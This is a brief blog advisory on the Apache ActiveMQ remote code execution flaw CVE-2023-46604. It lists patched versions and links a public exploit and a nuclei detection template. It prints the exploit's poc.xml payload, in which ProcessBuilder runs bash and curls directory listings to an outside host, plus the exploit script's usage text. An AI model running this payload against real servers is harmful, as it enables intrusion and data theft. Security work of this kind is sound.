New exploit for Apache ActiveMQ CVE-2023-46604

Update! Update! Update!

Last week, it was published a new exploit to attack Apache ActiveMQ, one of the most used messaging brokers. As Wikipedia says,

Apache ActiveMQ is an open source message broker written in Java together with a full Java Message Service (JMS) client.

The impact is quite HUGE: Remote Code Execution with Apache privileges.


Give a try to my 💰 Smart Contract Security Analysis Platform: SecurityDegen! On-chain scans and security patterns search.


If your organization is not using those versions, you are in big trouble:

ActiveMQ Classic:

  • 6.0.0

  • 5.18.3

  • 5.17.6

  • 5.16.7 (last release from this branch)

  • 5.15.16 (last release from this branch)

ActiveMQ Artemis:

  • 2.31.2

There are already a bunch of public exploits. You can have a look here: https://github.com/duck-sec/CVE-2023-46604-ActiveMQ-RCE-pseudoshell

Where the payload is triggered by poc.xml. You can see below that the problem is that there is not enough data filtering and the server executes whatever system commands you pass to the constructor of a bean id in the server:

<?xml version="1.0" encoding="UTF-8" ?>

<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">

<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
  <constructor-arg>
    <list>
      <value>bash</value>
      <value>-c</value>
      <value>ls -lah | awk '{print $0";"}' | curl -X POST -d @-   http://10.10.14.59:8181/receive_data</value>
    </list>
  </constructor-arg>
</bean>
</beans>

The usage of this exploit is quite simple:

usage: exploit.py [-h] -i IP [-p PORT] -si SRVIP [-sp SRVPORT]

optional arguments:
  -h, --help            show this help message and exit
  -i IP, --ip IP        ActiveMQ Server IP or Hostname
  -p PORT, --port PORT  ActiveMQ Server Port, defaults to 61616
  -si SRVIP, --srvip SRVIP
                        Serve IP
  -sp SRVPORT, --srvport SRVPORT
                        Serve port, defaults to 8080

Where IP and port are the vulnerable ActiveMQ servers and SRVIP and SRVPORT is your public IP address hosting the payload (poc.xml).

Also if you are running nuclei in your org, there is already a new template to check this vulnerability:
https://github.com/projectdiscovery/nuclei-templates/blob/48f2cd1b3ecf5963be495947e2e594e599e39d1f/network/cves/2023/CVE-2023-46604.yaml

More info:



Posted

in

by

Tags:

Comments

Leave a Reply

Your email address will not be published. Required fields are marked *